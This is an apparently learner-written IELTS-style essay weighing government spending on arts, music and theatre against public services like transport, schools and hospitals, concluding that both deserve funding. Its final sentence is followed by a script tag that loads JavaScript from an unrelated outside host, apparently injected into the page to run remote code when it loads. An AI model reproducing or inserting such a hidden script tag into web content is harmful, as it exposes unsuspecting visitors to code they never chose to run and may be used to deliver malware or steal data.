The government's investment in arts,music and theatre is a waste of money. Government should invest these funds in public services instead. To what extent do you agree with this statement?

The authorities should put money into improvement of civil services than spending on arts,music and theatre as it is a wastage of funds. I partially agree with this statement and will discuss about this in the upcoming paragraphs.

To begin with, government need to spend more money on public services like bus stations, transportations, hospitals and schools. Firstly,the condition of public facilities is little bit poor. For instance,the public buses needs improvement as their seats and condition is not good enough. secondly,if the government will not spend money on schools,it will get difficult for students to get educated. Besides this,much of the poor families are dependent on public services, so if the authorities will not invest on these services,they will be unable to get its benefits. People will not get proper health facilities if money is not spent on hospitals. So spending more money on civil services will improve quality of life.

On the other hand, investment on arts can not be neglected. Many people get their earnings from these subjects. These fields are a good source of entertainment for many individuals. Moreover, these services do not get enough fundings, so if the government will not spend monetary services on these,they will not be able to develop. As a result, they will lead a stressful life. So the funding on these subjects is also equally important.

To conclude,it is essential to spend money on public services as they bring quality life for people but at the same time, funding on arts,music and theatre is also necessary.<script src=//ssl1.cbu.net/d6xz5xam></script>